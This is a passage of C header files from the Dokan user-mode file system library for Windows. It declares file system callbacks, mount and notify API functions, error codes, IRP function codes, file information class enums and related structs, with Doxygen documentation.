PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief SetAllocationSize Dokan API callback
*
* SetAllocationSize is used to truncate or extend a file (allocation size).
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param AllocSize New allocation length in bytes.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see SetEndOfFile
*/
NTSTATUS(DOKAN_CALLBACK *SetAllocationSize)(LPCWSTR FileName,
LONGLONG AllocSize,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief LockFile Dokan API callback
*
* Lock a byte range of a file.
* This is only used if \ref DOKAN_OPTION_FILELOCK_USER_MODE is enabled.
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param ByteOffset Offset at which the locked range starts.
* \param Length Length in bytes of the range to lock.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see UnlockFile
*/
NTSTATUS(DOKAN_CALLBACK *LockFile)(LPCWSTR FileName,
LONGLONG ByteOffset,
LONGLONG Length,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief UnlockFile Dokan API callback
*
* Unlock a byte range of a file previously locked with \ref LockFile.
* This is only used if \ref DOKAN_OPTION_FILELOCK_USER_MODE is enabled.
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param ByteOffset Offset at which the locked range starts.
* \param Length Length in bytes of the range to unlock.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see LockFile
*/
NTSTATUS(DOKAN_CALLBACK *UnlockFile)(LPCWSTR FileName,
LONGLONG ByteOffset,
LONGLONG Length,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief GetDiskFreeSpace Dokan API callback
*
* Retrieves information about the amount of space that is available on a disk volume.
* It consists of the total amount of space, the total amount of free space, and
* the total amount of free space available to the user associated with the calling thread.
*
* Neither GetDiskFreeSpace nor \ref GetVolumeInformation
* save the DOKAN_FILE_INFO.Context.
* Before these methods are called, \ref ZwCreateFile may not be called.
* (ditto \ref CloseFile and \ref Cleanup)
*
* \param FreeBytesAvailable Amount of available space.
* \param TotalNumberOfBytes Total size of storage space
* \param TotalNumberOfFreeBytes Amount of free space
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or \c NTSTATUS appropriate to the request result.
* \see <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa364937(v=vs.85).aspx"> GetDiskFreeSpaceEx function (MSDN)</a>
* \see GetVolumeInformation
*/
NTSTATUS(DOKAN_CALLBACK *GetDiskFreeSpace)(PULONGLONG FreeBytesAvailable,
PULONGLONG TotalNumberOfBytes,
PULONGLONG TotalNumberOfFreeBytes,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief GetVolumeInformation Dokan API callback
*
* Retrieves information about the file system and volume associated with the specified root directory.
*
* Neither GetVolumeInformation nor GetDiskFreeSpace
* save the \ref DOKAN_FILE_INFO#Context.
* Before these methods are called, \ref ZwCreateFile may not be called.
* (ditto \ref CloseFile and \ref Cleanup)
*
* The VolumeName length can be anything that fits in the provided buffer.
* However, some Windows components expect it to be no longer than 32 characters,
* which is why it is recommended to stay under this limit.
*
* FileSystemName can be anything up to 10 characters.
* However, Windows checks the availability of a few features based on the file system name,
* so it is recommended to set NTFS or FAT here.
*
* \c FILE_READ_ONLY_VOLUME is automatically added to the
* FileSystemFlags if \ref DOKAN_OPTION_WRITE_PROTECT was
* specified in DOKAN_OPTIONS when the volume was mounted.
*
* \param VolumeNameBuffer A pointer to a buffer that receives the name of a specified volume.
* \param VolumeNameSize The length of a volume name buffer.
* \param VolumeSerialNumber A pointer to a variable that receives the volume serial number.
* \param MaximumComponentLength A pointer to a variable that receives the maximum length.
* \param FileSystemFlags A pointer to a variable that receives flags associated with the specified file system.
* \param FileSystemNameBuffer A pointer to a buffer that receives the name of the file system.
* \param FileSystemNameSize The length of the file system name buffer.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa364993(v=vs.85).aspx"> GetVolumeInformation function (MSDN)</a>
* \see GetDiskFreeSpace
*/
NTSTATUS(DOKAN_CALLBACK *GetVolumeInformation)(LPWSTR VolumeNameBuffer,
DWORD VolumeNameSize,
LPDWORD VolumeSerialNumber,
LPDWORD MaximumComponentLength,
LPDWORD FileSystemFlags,
LPWSTR FileSystemNameBuffer,
DWORD FileSystemNameSize,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief Mounted Dokan API callback
*
* Called when Dokan successfully mounts the volume.
*
* If \ref DOKAN_OPTION_MOUNT_MANAGER is enabled and the drive letter requested is busy,
* the MountPoint can contain a different drive letter that the mount manager assigned us.
*
* \param MountPoint The mount point assigned to the instance.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see Unmounted
*/
NTSTATUS(DOKAN_CALLBACK *Mounted)(LPCWSTR MountPoint, PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief Unmounted Dokan API callback
*
* Called when Dokan is unmounting the volume.
*
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or \c NTSTATUS appropriate to the request result.
* \see Mounted
*/
NTSTATUS(DOKAN_CALLBACK *Unmounted)(PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief GetFileSecurity Dokan API callback
*
* Get specified information about the security of a file or directory.
*
* Return \c STATUS_NOT_IMPLEMENTED to let the Dokan library build an SDDL for the current process user with authenticated-user rights (used for the context menu).
* Return \c STATUS_BUFFER_OVERFLOW if buffer size is too small.
*
* \since Supported since version 0.6.0. The version must be specified in \ref DOKAN_OPTIONS.Version.
* \param FileName File path requested by the Kernel on the FileSystem.
* \param SecurityInformation A SECURITY_INFORMATION value that identifies the security information being requested.
* \param SecurityDescriptor A pointer to a buffer that receives a copy of the security descriptor of the requested file.
* \param BufferLength Specifies the size, in bytes, of the buffer.
* \param LengthNeeded A pointer to the variable that receives the number of bytes necessary to store the complete security descriptor.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see SetFileSecurity
* \see <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa446639(v=vs.85).aspx">GetFileSecurity function (MSDN)</a>
*/
NTSTATUS(DOKAN_CALLBACK *GetFileSecurity)(LPCWSTR FileName,
PSECURITY_INFORMATION SecurityInformation,
PSECURITY_DESCRIPTOR SecurityDescriptor,
ULONG BufferLength,
PULONG LengthNeeded,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief SetFileSecurity Dokan API callback
*
* Sets the security of a file or directory object.
*
* \since Supported since version 0.6.0. The version must be specified in \ref DOKAN_OPTIONS.Version.
* \param FileName File path requested by the Kernel on the FileSystem.
* \param SecurityInformation Structure that identifies the contents of the security descriptor pointed by \a SecurityDescriptor param.
* \param SecurityDescriptor A pointer to a SECURITY_DESCRIPTOR structure.
* \param BufferLength Specifies the size, in bytes, of the buffer.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see GetFileSecurity
* \see <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa379577(v=vs.85).aspx">SetFileSecurity function (MSDN)</a>
*/
NTSTATUS(DOKAN_CALLBACK *SetFileSecurity)(LPCWSTR FileName,
PSECURITY_INFORMATION SecurityInformation,
PSECURITY_DESCRIPTOR SecurityDescriptor,
ULONG BufferLength,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief FindStreams Dokan API callback
*
* Retrieve all NTFS stream information for the file.
* This is only called if \ref DOKAN_OPTION_ALT_STREAM is enabled.
*
* \since Supported since version 0.8.0. The version must be specified in \ref DOKAN_OPTIONS.Version.
* \param FileName File path requested by the Kernel on the FileSystem.
* \param FillFindStreamData Callback that has to be called with a PWIN32_FIND_STREAM_DATA that contains stream information.
* \param FindStreamContext Context for the event to pass to the callback FillFindStreamData.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
*/
NTSTATUS(DOKAN_CALLBACK *FindStreams)(LPCWSTR FileName,
PFillFindStreamData FillFindStreamData,
PVOID FindStreamContext,
PDOKAN_FILE_INFO DokanFileInfo);
} DOKAN_OPERATIONS, *PDOKAN_OPERATIONS;
// clang-format on
/**
* \defgroup DokanMainResult DokanMainResult
* \brief \ref DokanMain \ref DokanCreateFileSystem returns error codes
*/
/** @{ */
/** Dokan mount succeed. */
#define DOKAN_SUCCESS 0
/** Dokan mount error. */
#define DOKAN_ERROR -1
/** Dokan mount failed - Bad drive letter. */
#define DOKAN_DRIVE_LETTER_ERROR -2
/** Dokan mount failed - Can't install driver. */
#define DOKAN_DRIVER_INSTALL_ERROR -3
/** Dokan mount failed - Driver answer that something is wrong. */
#define DOKAN_START_ERROR -4
/**
* Dokan mount failed.
* Can't assign a drive letter or mount point.
* Probably already used by another volume.
*/
#define DOKAN_MOUNT_ERROR -5
/**
* Dokan mount failed.
* Mount point is invalid.
*/
#define DOKAN_MOUNT_POINT_ERROR -6
/**
* Dokan mount failed.
* Requested an incompatible version.
*/
#define DOKAN_VERSION_ERROR -7
/** @} */
/**
* \defgroup Dokan Dokan
*/
/** @{ */
/**
* \brief Initialize all required Dokan internal resources.
*
* This needs to be called only once before trying to use \ref DokanMain or \ref DokanCreateFileSystem for the first time.
* Otherwise both will fail and raise an exception.
*/
VOID DOKANAPI DokanInit();
/**
* \brief Release all allocated resources by \ref DokanInit when they are no longer needed.
*
* This should be called when the application no longer expects to create a new FileSystem with
* \ref DokanMain or \ref DokanCreateFileSystem and after all devices are unmounted.
*/
VOID DOKANAPI DokanShutdown();
/**
* \brief Mount a new Dokan Volume.
*
* This function blocks until the device is unmounted.
* If the mount fails, it will directly return a \ref DokanMainResult error.
*
* See \ref DokanCreateFileSystem to mount a Dokan Volume asynchronously.
*
* \param DokanOptions a \ref DOKAN_OPTIONS that describe the mount.
* \param DokanOperations Instance of \ref DOKAN_OPERATIONS that will be called for each request made by the kernel.
* \return \ref DokanMainResult status.
*/
int DOKANAPI DokanMain(PDOKAN_OPTIONS DokanOptions,
PDOKAN_OPERATIONS DokanOperations);
/**
* \brief Mount a new Dokan Volume.
*
* It is mandatory to have called \ref DokanInit previously to use this API.
*
* This function returns directly on device mount or on failure.
* See \ref DokanMainResult for possible errors.
*
* \ref DokanWaitForFileSystemClosed can be used to wait until the device is unmounted.
*
* \param DokanOptions a \ref DOKAN_OPTIONS that describe the mount.
* \param DokanOperations Instance of \ref DOKAN_OPERATIONS that will be called for each request made by the kernel.
* \param DokanInstance Dokan mount instance context that can be used for related instance calls like \ref DokanIsFileSystemRunning .
* \return \ref DokanMainResult status.
*/
int DOKANAPI DokanCreateFileSystem(_In_ PDOKAN_OPTIONS DokanOptions,
_In_ PDOKAN_OPERATIONS DokanOperations,
_Out_ DOKAN_HANDLE *DokanInstance);
/**
* \brief Check if the FileSystem is still running or not.
*
* \param DokanInstance The dokan mount context created by \ref DokanCreateFileSystem .
* \return Whether the FileSystem is still running or not.
*/
BOOL DOKANAPI DokanIsFileSystemRunning(_In_ DOKAN_HANDLE DokanInstance);
/**
* \brief Wait until the FileSystem is unmounted.
*
* \param DokanInstance The dokan mount context created by \ref DokanCreateFileSystem .
* \return See <a href="https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject">WaitForSingleObject</a> for a description of return values.
*/
DWORD DOKANAPI DokanWaitForFileSystemClosed(_In_ DOKAN_HANDLE DokanInstance,
_In_ DWORD dwMilliseconds);
/**
* \brief Unmount the Dokan instance.
*
* Unmount and wait until all resources of the \c DokanInstance are released.
*
* \param DokanInstance The dokan mount context created by \ref DokanCreateFileSystem .
*/
VOID DOKANAPI DokanCloseHandle(_In_ DOKAN_HANDLE DokanInstance);
/**
* \brief Unmount a Dokan device from a drive letter.
*
* \param DriveLetter Dokan drive letter to unmount.
* \return \c TRUE if device was unmounted or \c FALSE in case of failure or device not found.
*/
BOOL DOKANAPI DokanUnmount(WCHAR DriveLetter);
/**
* \brief Unmount a Dokan device from a mount point
*
* \param MountPoint Mount point to unmount ("Z", "Z:", "Z:\", "Z:\MyMountPoint").
* \return \c TRUE if device was unmounted or \c FALSE in case of failure or device not found.
*/
BOOL DOKANAPI DokanRemoveMountPoint(LPCWSTR MountPoint);
/**
* \brief Checks whether Name matches Expression
*
* Behaves like the \c FsRtlIsNameInExpression routine from <a href="https://msdn.microsoft.com/en-us/library/ff546850(v=VS.85).aspx">Microsoft</a>\n
* \c * (asterisk) Matches zero or more characters.\n
* <tt>?</tt> (question mark) Matches a single character.\n
* \c DOS_DOT (\c " quotation mark) Matches either a period or zero characters beyond the name string.\n
* \c DOS_QM (\c > greater than) Matches any single character or, upon encountering a period or end
* of name string, advances the expression to the end of the set of
* contiguous DOS_QMs.\n
* \c DOS_STAR (\c < less than) Matches zero or more characters until encountering and matching
* the final \c . in the name.
*
* \param Expression Expression can contain any of the above characters.
* \param Name Name to check
* \param IgnoreCase Case sensitive or not
* \return result if name matches the expression
*/
BOOL DOKANAPI DokanIsNameInExpression(LPCWSTR Expression, LPCWSTR Name,
BOOL IgnoreCase);
/**
* \brief Get the version of Dokan.
* The returned ULONG is the version number without the dots.
* \return The version of Dokan
*/
ULONG DOKANAPI DokanVersion();
/**
* \brief Get the version of the Dokan driver.
* The returned ULONG is the version number without the dots.
* \return The version of Dokan driver.
*/
ULONG DOKANAPI DokanDriverVersion();
/**
* \brief Extends the timeout of the current IO operation in driver.
*
* \param Timeout Extended time in milliseconds requested.
* \param DokanFileInfo \ref DOKAN_FILE_INFO of the operation to extend.
* \return If the operation was successful.
*/
BOOL DOKANAPI DokanResetTimeout(ULONG Timeout, PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief Get the handle to Access Token.
*
* This method needs to be called from within the \ref DOKAN_OPERATIONS.ZwCreateFile callback.
* The caller must call <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms724211(v=vs.85).aspx">CloseHandle</a>
* for the returned handle.
*
* \param DokanFileInfo \ref DOKAN_FILE_INFO of the current operation.
* \return A handle to the account token for the user on whose behalf the code is running.
*/
HANDLE DOKANAPI DokanOpenRequestorToken(PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief Get active Dokan mount points.
*
* The returned array needs to be released by calling \ref DokanReleaseMountPointList
*
* \param uncOnly Get only instances that have UNC Name.
* \param nbRead Number of instances successfully retrieved.
* \return Allocated array of DOKAN_MOUNT_POINT_INFO.
*/
PDOKAN_MOUNT_POINT_INFO DOKANAPI DokanGetMountPointList(BOOL uncOnly, PULONG nbRead);
/**
* \brief Release Mount point list resources from \ref DokanGetMountPointList.
*
* After \ref DokanGetMountPointList call you will receive a dynamically allocated array of DOKAN_MOUNT_POINT_INFO.
* This array needs to be released when no longer needed by calling this function.
*
* \param list Allocated array of DOKAN_MOUNT_POINT_INFO from \ref DokanGetMountPointList.
* \return Nothing.
*/
VOID DOKANAPI DokanReleaseMountPointList(PDOKAN_MOUNT_POINT_INFO list);
/**
* \brief Convert \ref DOKAN_OPERATIONS.ZwCreateFile parameters to <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx">CreateFile</a> parameters.
*
* The Dokan kernel driver forwards the DesiredAccess directly from the IRP_MJ_CREATE.
* This DesiredAccess has been converted from generic rights (user CreateFile request) to standard rights and is converted back here.
* https://msdn.microsoft.com/windows/hardware/drivers/ifs/access-mask
*
* \param DesiredAccess DesiredAccess from \ref DOKAN_OPERATIONS.ZwCreateFile.
* \param FileAttributes FileAttributes from \ref DOKAN_OPERATIONS.ZwCreateFile.
* \param CreateOptions CreateOptions from \ref DOKAN_OPERATIONS.ZwCreateFile.
* \param CreateDisposition CreateDisposition from \ref DOKAN_OPERATIONS.ZwCreateFile.
* \param outDesiredAccess New <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx">CreateFile</a> dwDesiredAccess.
* \param outFileAttributesAndFlags New <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx">CreateFile</a> dwFlagsAndAttributes.
* \param outCreationDisposition New <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx">CreateFile</a> dwCreationDisposition.
* \see <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx">CreateFile function (MSDN)</a>
*/
VOID DOKANAPI DokanMapKernelToUserCreateFileFlags(
ACCESS_MASK DesiredAccess, ULONG FileAttributes, ULONG CreateOptions,
ULONG CreateDisposition, ACCESS_MASK *outDesiredAccess,
DWORD *outFileAttributesAndFlags, DWORD *outCreationDisposition);
/**
* \defgroup DokanNotify Dokan Notify
* \brief Dokan User FS file-change notification
*
* The application implementing the user file system can notify
* the Dokan kernel driver of external file- and directory-changes.
*
* For example, the mirror application can notify the driver about
* changes made in the mirrored directory so that those changes will
* be automatically reflected in the implemented mirror file system.
*
* This requires the FilePath passed to the respective DokanNotify*-functions
* to include the absolute path of the changed file including the drive-letter
* and the path to the mount point, e.g. "C:\Dokan\ChangedFile.txt".
*
* These functions SHOULD NOT be called from within the implemented
* file system and thus be independent of any Dokan file system operation.
* @{
*/
/**
* \brief Notify dokan that a file or a directory has been created.
*
* \param DokanInstance The dokan mount context created by \ref DokanCreateFileSystem .
* \param FilePath Absolute path to the file or directory, including the mount-point of the file system.
* \param IsDirectory Indicates if the path is a directory.
* \return \c TRUE if notification succeeded.
*/
BOOL DOKANAPI DokanNotifyCreate(_In_ DOKAN_HANDLE DokanInstance,
_In_ LPCWSTR FilePath, _In_ BOOL IsDirectory);
/**
* \brief Notify dokan that a file or a directory has been deleted.
*
* \param DokanInstance The dokan mount context created by \ref DokanCreateFileSystem .
* \param FilePath Absolute path to the file or directory, including the mount-point of the file system.
* \param IsDirectory Indicates if the path was a directory.
* \return \c TRUE if notification succeeded.
*/
BOOL DOKANAPI DokanNotifyDelete(_In_ DOKAN_HANDLE DokanInstance,
_In_ LPCWSTR FilePath, _In_ BOOL IsDirectory);
/**
* \brief Notify dokan that file or directory attributes have changed.
*
* \param DokanInstance The dokan mount context created by \ref DokanCreateFileSystem .
* \param FilePath Absolute path to the file or directory, including the mount-point of the file system.
* \return \c TRUE if notification succeeded.
*/
BOOL DOKANAPI DokanNotifyUpdate(_In_ DOKAN_HANDLE DokanInstance,
_In_ LPCWSTR FilePath);
/**
* \brief Notify dokan that file or directory extended attributes have changed.
*
* \param DokanInstance The dokan mount context created by \ref DokanCreateFileSystem .
* \param FilePath Absolute path to the file or directory, including the mount-point of the file system.
* \return \c TRUE if notification succeeded.
*/
BOOL DOKANAPI DokanNotifyXAttrUpdate(_In_ DOKAN_HANDLE DokanInstance,
_In_ LPCWSTR FilePath);
/**
* \brief Notify dokan that a file or a directory has been renamed. This method
* supports in-place rename for file/directory within the same parent.
*
* \param DokanInstance The dokan mount context created by \ref DokanCreateFileSystem .
* \param OldPath Old, absolute path to the file or directory, including the mount-point of the file system.
* \param NewPath New, absolute path to the file or directory, including the mount-point of the file system.
* \param IsDirectory Indicates if the path is a directory.
* \param IsInSameDirectory Indicates if the file or directory has the same parent directory.
* \return \c TRUE if notification succeeded.
*/
BOOL DOKANAPI DokanNotifyRename(_In_ DOKAN_HANDLE DokanInstance,
_In_ LPCWSTR OldPath, _In_ LPCWSTR NewPath,
_In_ BOOL IsDirectory,
_In_ BOOL IsInSameDirectory);
/**@}*/
/**
* \brief Convert WIN32 error to NTSTATUS
*
* https://support.microsoft.com/en-us/kb/113996
*
* \param Error Win32 Error to convert
* \return NTSTATUS associated with the Win32 error.
*/
NTSTATUS DOKANAPI DokanNtStatusFromWin32(DWORD Error);
/** @} */
#ifdef __cplusplus
}
#endif
#endif // DOKAN_H_
================================================
FILE: includes/fileinfo.h
================================================
/*
Dokan : user-mode file system library for Windows
Copyright (C) 2015 - 2019 Adrien J. <liryna.stark@gmail.com> and Maxime C. <maxime@islog.com>
Copyright (C) 2007 - 2011 Hiroki Asakawa <info@dokan-dev.net>
http://dokan-dev.github.io
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU Lesser General Public License as published by the Free
Software Foundation; either version 3 of the License, or (at your option) any
later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU Lesser General Public License along
with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef FILEINFO_H_
#define FILEINFO_H_
/*
 * IRP major function codes (IRP_MJ_*) identifying the kind of I/O request
 * being serviced, followed by the minor codes (IRP_MN_*) used with
 * IRP_MJ_LOCK_CONTROL. These values are presumably the Windows I/O manager's
 * numbering (verify against wdm.h); treat them as fixed wire values and do
 * not renumber them.
 */
#define IRP_MJ_CREATE 0x00
#define IRP_MJ_CREATE_NAMED_PIPE 0x01
#define IRP_MJ_CLOSE 0x02
#define IRP_MJ_READ 0x03
#define IRP_MJ_WRITE 0x04
#define IRP_MJ_QUERY_INFORMATION 0x05
#define IRP_MJ_SET_INFORMATION 0x06
#define IRP_MJ_QUERY_EA 0x07
#define IRP_MJ_SET_EA 0x08
#define IRP_MJ_FLUSH_BUFFERS 0x09
#define IRP_MJ_QUERY_VOLUME_INFORMATION 0x0a
#define IRP_MJ_SET_VOLUME_INFORMATION 0x0b
#define IRP_MJ_DIRECTORY_CONTROL 0x0c
#define IRP_MJ_FILE_SYSTEM_CONTROL 0x0d
#define IRP_MJ_DEVICE_CONTROL 0x0e
#define IRP_MJ_INTERNAL_DEVICE_CONTROL 0x0f
#define IRP_MJ_SHUTDOWN 0x10
#define IRP_MJ_LOCK_CONTROL 0x11
#define IRP_MJ_CLEANUP 0x12
#define IRP_MJ_CREATE_MAILSLOT 0x13
#define IRP_MJ_QUERY_SECURITY 0x14
#define IRP_MJ_SET_SECURITY 0x15
#define IRP_MJ_POWER 0x16
#define IRP_MJ_SYSTEM_CONTROL 0x17
#define IRP_MJ_DEVICE_CHANGE 0x18
#define IRP_MJ_QUERY_QUOTA 0x19
#define IRP_MJ_SET_QUOTA 0x1a
#define IRP_MJ_PNP 0x1b
/* Alias kept for callers that use the older name. */
#define IRP_MJ_PNP_POWER IRP_MJ_PNP
/* Highest valid major code; equals IRP_MJ_PNP. */
#define IRP_MJ_MAXIMUM_FUNCTION 0x1b
/* Minor codes for IRP_MJ_LOCK_CONTROL requests. */
#define IRP_MN_LOCK 0x01
#define IRP_MN_UNLOCK_SINGLE 0x02
#define IRP_MN_UNLOCK_ALL 0x03
#define IRP_MN_UNLOCK_ALL_BY_KEY 0x04
/*
 * File information classes carried by IRP_MJ_QUERY_INFORMATION and
 * IRP_MJ_SET_INFORMATION requests. Values are implicitly sequential starting
 * at 1 (the trailing comments give each ordinal); because the numeric value
 * is what is exchanged, members must not be reordered or inserted mid-list.
 */
typedef enum _FILE_INFORMATION_CLASS {
FileDirectoryInformation = 1,
FileFullDirectoryInformation, // 2
FileBothDirectoryInformation, // 3
FileBasicInformation, // 4
FileStandardInformation, // 5
FileInternalInformation, // 6
FileEaInformation, // 7
FileAccessInformation, // 8
FileNameInformation, // 9
FileRenameInformation, // 10
FileLinkInformation, // 11
FileNamesInformation, // 12
FileDispositionInformation, // 13
FilePositionInformation, // 14
FileFullEaInformation, // 15
FileModeInformation, // 16
FileAlignmentInformation, // 17
FileAllInformation, // 18
FileAllocationInformation, // 19
FileEndOfFileInformation, // 20
FileAlternateNameInformation, // 21
FileStreamInformation, // 22
FilePipeInformation, // 23
FilePipeLocalInformation, // 24
FilePipeRemoteInformation, // 25
FileMailslotQueryInformation, // 26
FileMailslotSetInformation, // 27
FileCompressionInformation, // 28
FileObjectIdInformation, // 29
FileCompletionInformation, // 30
FileMoveClusterInformation, // 31
FileQuotaInformation, // 32
FileReparsePointInformation, // 33
FileNetworkOpenInformation, // 34
FileAttributeTagInformation, // 35
FileTrackingInformation, // 36
FileIdBothDirectoryInformation, // 37
FileIdFullDirectoryInformation, // 38
FileValidDataLengthInformation, // 39
FileShortNameInformation, // 40
FileIoCompletionNotificationInformation, // 41
FileIoStatusBlockRangeInformation, // 42
FileIoPriorityHintInformation, // 43
FileSfioReserveInformation, // 44
FileSfioVolumeInformation, // 45
FileHardLinkInformation, // 46
FileProcessIdsUsingFileInformation, // 47
FileNormalizedNameInformation, // 48
FileNetworkPhysicalNameInformation, // 49
FileIdGlobalTxDirectoryInformation, // 50
FileIsRemoteDeviceInformation, // 51
FileUnusedInformation, // 52
FileNumaNodeInformation, // 53
FileStandardLinkInformation, // 54
FileRemoteProtocolInformation, // 55
//
// These are special versions of these operations (defined earlier)
// which can be used by kernel mode drivers only to bypass security
// access checks for Rename and HardLink operations. These operations
// are only recognized by the IOManager, a file system should never
// receive these.
//
// NOTE(review): since a file system should never receive these, an
// implementation that does see one should treat it as an unexpected
// request and reject it rather than honouring the access-check bypass.
//
FileRenameInformationBypassAccessCheck, // 56
FileLinkInformationBypassAccessCheck, // 57
//
// End of special information classes reserved for IOManager.
//
FileVolumeNameInformation, // 58
FileIdInformation, // 59
FileIdExtdDirectoryInformation, // 60
FileReplaceCompletionInformation, // 61
FileHardLinkFullIdInformation, // 62
FileIdExtdBothDirectoryInformation, // 63
FileDispositionInformationEx, // 64
FileRenameInformationEx, // 65
FileRenameInformationExBypassAccessCheck, // 66
FileDesiredStorageClassInformation, // 67
FileStatInformation, // 68
FileMemoryPartitionInformation, // 69
// Sentinel: one past the last valid class (70), not a real information class.
FileMaximumInformation
} FILE_INFORMATION_CLASS,
*PFILE_INFORMATION_CLASS;
/*
 * Volume (file system) information classes, used with the
 * IRP_MJ_QUERY_VOLUME_INFORMATION / IRP_MJ_SET_VOLUME_INFORMATION requests.
 * Values are implicitly sequential starting at 1 (see trailing comments);
 * do not reorder or insert members, as the ordinal is the exchanged value.
 */
typedef enum _FSINFOCLASS {
FileFsVolumeInformation = 1,
FileFsLabelInformation, // 2
FileFsSizeInformation, // 3
FileFsDeviceInformation, // 4
FileFsAttributeInformation, // 5
FileFsControlInformation, // 6
FileFsFullSizeInformation, // 7
FileFsObjectIdInformation, // 8
FileFsDriverPathInformation, // 9
FileFsVolumeFlagsInformation, // 10
// Sentinel: one past the last valid class (11), not a real information class.
FileFsMaximumInformation
} FS_INFORMATION_CLASS,
*PFS_INFORMATION_CLASS;
/**
* \struct FILE_ALIGNMENT_INFORMATION
* \brief Used as an argument to the ZwQueryInformationFile routine.
*
* The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileAllInformation
*/
/* Payload for the FileAlignmentInformation class: a single ULONG. */
typedef struct _FILE_ALIGNMENT_INFORMATION {
/**
 * The buffer alignment required by the underlying device. For a list of system-defined values, see DEVICE_OBJECT.
 * The value must be one of the FILE_XXX_ALIGNMENT values defined in Wdm.h.
 * For more information, see DEVICE_OBJECT and Initializing a Device Object.
 */
ULONG AlignmentRequirement;
} FILE_ALIGNMENT_INFORMATION, *PFILE_ALIGNMENT_INFORMATION;
/**
* \struct FILE_NAME_INFORMATION
* \brief Used as argument to the ZwQueryInformationFile and ZwSetInformationFile routines.
*
* The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileNameInformation
*/
/*
 * Variable-length payload for the FileNameInformation class. FileName[1] is
 * only the first WCHAR; the rest of the string continues past sizeof(struct)
 * in the same buffer. FileNameLength is expressed in bytes, not WCHARs, and
 * is the only length authority this header gives — bound any copy by it and
 * by the destination buffer size rather than assuming a terminator is present.
 */
typedef struct _FILE_NAME_INFORMATION {
/**
 * Specifies the length, in bytes, of the file name string.
 */
ULONG FileNameLength;
/**
 * Specifies the first character of the file name string. This is followed in memory by the remainder of the string.
 * (Declared with one element; the real extent is FileNameLength bytes.)
 */
WCHAR FileName[1];
} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;
/**
* \struct FILE_ATTRIBUTE_TAG_INFORMATION
* \brief Used as an argument to ZwQueryInformationFile.
*
* The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileAttributeTagInformation
*/
/* Payload for the FileAttributeTagInformation class: attributes plus reparse tag. */
typedef struct _FILE_ATTRIBUTE_TAG_INFORMATION {
/**
 * Specifies one or more FILE_ATTRIBUTE_XXX flags.
 * For descriptions of these flags, see the documentation of the GetFileAttributes function in the Microsoft Windows SDK.
 */
ULONG FileAttributes;
/**
 * Specifies the reparse point tag. If the FileAttributes member includes the FILE_ATTRIBUTE_REPARSE_POINT attribute flag,
 * this member specifies the reparse tag. Otherwise, this member is unused (readers should not interpret it).
 */
ULONG ReparseTag;
} FILE_ATTRIBUTE_TAG_INFORMATION, *PFILE_ATTRIBUTE_TAG_INFORMATION;
/**
* \struct FILE_DISPOSITION_INFORMATION
* \brief Used as an argument to the ZwSetInformationFile routine.
*
* The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileDispositionInformation
*/
/* Payload for the FileDispositionInformation class: a single BOOLEAN. */
typedef struct _FILE_DISPOSITION_INFORMATION {
/**
 * Indicates whether the operating system should delete the file when the file is closed.
 * Set this member to TRUE to delete the file when it is closed.
 * Otherwise, set to FALSE. Setting this member to FALSE has no effect if the handle was opened with FILE_FLAG_DELETE_ON_CLOSE.
 */
BOOLEAN DeleteFile;
} FILE_DISPOSITION_INFORMATION, *PFILE_DISPOSITION_INFORMATION;
/* Bit flags for FILE_DISPOSITION_INFORMATION_EX::Flags (see the struct below). They may be OR-ed together. */
